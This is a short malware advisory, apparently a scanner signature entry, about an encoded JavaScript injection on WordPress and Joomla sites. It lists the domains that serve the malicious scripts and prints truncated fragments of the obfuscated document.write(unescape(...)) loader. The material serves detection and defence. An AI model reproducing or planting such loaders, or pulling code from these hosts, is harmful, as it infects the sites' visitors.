Description:This encoded javascript loads malware from:
.myads.name/system/caption.js
.adsnet.biz/system/caption.js
.toolbarcom.org/system/caption.js
.mybar.us/system/caption.js
.freead.name/system/caption.js
bl.prshow.org/js/in.js
bl.pqshow.org/js/in.js
bl2.prshow.org/js/in.js
bl2.pqshow.org/js/in.js
.ipwn.ws
.crocro.biz/
.etufg.com/tools/js.js
sliero.co.cc
And some sub domains within it:
"vagi.","vain.","vale.","vars.","vary.","vasa.","vaut.",
"vavs.","viny.","viol.","vrow.","vugs.","vuln."
Affecting: Any web site (common on WordPress and Joomla) hosted at Rackspace, Mediatemple and Bluehost.
Malware dump:
document. write (unescape( '%3C %73 %63%72%69%70%74%20%6C%61%6E%67%75 %61%67%65%3D%22%6A%61%76%61%73%63%72%69 %70%74%22%20%74..
;var st1 = 0;document. write ( unescape (' %3C%73%63%72%69%70%74...